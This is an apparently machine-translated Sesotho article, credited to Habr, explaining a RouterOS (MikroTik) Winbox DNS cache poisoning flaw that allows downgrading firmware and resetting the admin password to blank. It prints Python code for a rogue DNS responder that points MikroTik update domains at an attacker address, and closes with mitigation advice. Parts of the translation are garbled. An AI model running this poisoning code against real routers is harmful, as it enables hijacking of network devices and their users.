Bokhoni ba ho theola lisebelisoa tse thehiloeng ho RouterOS (Mikrotik) hole hole ho beha makholo a likete a lisebelisoa tsa marang-rang kotsing. Ho ba kotsing ho amahanngoa le chefo ea cache ea DNS ea protocol ea Winbox mme e u lumella ho kenya nako ea khale (ka reset ea kamehla ea password) kapa firmware e fetotsoeng ho sesebelisoa.
Lintlha tsa ts'oaetso
Seteishene sa RouterOS se tšehetsa taelo ea tharollo bakeng sa ho sheba DNS.
Kopo ena e sebetsanoa ke binary e bitsoang solver. Resolver ke e 'ngoe ea li-binaries tse ngata tse hokahantsoeng le protocol ea Winbox ea RouterOS. Boemong bo phahameng, "melaetsa" e rometsoeng boema-kepeng ba Winbox e ka fetisetsoa ho li-binaries tse fapaneng ho RouterOS ho ipapisitsoe le leano le thehiloeng ho linomoro.
Ka kamehla, RouterOS e na le sebopeho sa seva sa DNS se holofalitsoeng.
Leha ho le joalo, le ha mosebetsi oa seva o holofetse, router e boloka cache ea eona ea DNS.
Ha re etsa kopo re sebelisa winbox_dns_request mohlala mohlala.com, router e tla boloka sephetho.
Kaha re ka hlakisa seva ea DNS eo kopo e lokelang ho ea ho eona, ho kenya liaterese tse fosahetseng ha ho bonolo. Ka mohlala, o ka lokisa ts'ebetsong ea seva sa DNS ho tloha ho araba kamehla ka rekoto ea A e nang le aterese ea IP 192.168.88.250.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()Joale haeba u batla mohlala.com u sebelisa Winbox, u ka bona hore cache ea DNS ea router e chefo.
Ehlile, poisoning example.com ha e na thuso haholo kaha router e ke ke ea e sebelisa. Leha ho le joalo, router e hloka ho fihlella upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com le download.mikrotik.com. 'Me ka lebaka la phoso e' ngoe, hoa khoneha ho li chefo kaofela ka nako e le 'ngoe.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("download.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()Router e kopa tumello e le 'ngoe, 'me re fana ka tse hlano. Router ha e boloke likarabo tsena kaofela ka nepo.
Ho totobetse hore tlhaselo ena e boetse e na le thuso haeba router e sebetsa joaloka seva sa DNS, kaha e lumella bareki ba router hore ba hlaseloe.
Tlhaselo ena e boetse e u lumella ho sebelisa monyetla oa ho ba kotsing e kholo: ho theola kapa ho khutlisa mofuta oa RouterOS. Motho ea hlaselang o khutlisetsa mohopolo oa seva sa ntlafatso, ho kenyeletsoa le changelog, mme o qobella RouterOS ho bona mofuta oa khale (o kotsing) e le oa hajoale. Kotsi mona e teng tabeng ea hore ha phetolelo e "ntlafalitsoe", password ea motsamaisi e tsosolosoa ho boleng ba kamehla - mohlaseli a ka kena tsamaisong ka password e se nang letho!
Tlhaselo e sebetsa haholo, leha ho le joalo e kenya lisebelisoa tse ling tse 'maloa, ho kenyelletsa le tse amanang le , empa ena e se e ntse e le mokhoa o sa sebetseng 'me tšebeliso ea eona bakeng sa merero e seng molaong ha e molaong.
tšireletso ea
Ho thibela Winbox feela ho u lumella ho itšireletsa litlhaselong tsena. Leha ho le bonolo ho tsamaisa ka Winbox, ho molemo ho sebelisa protocol ea SSH.
Source: www.habr.com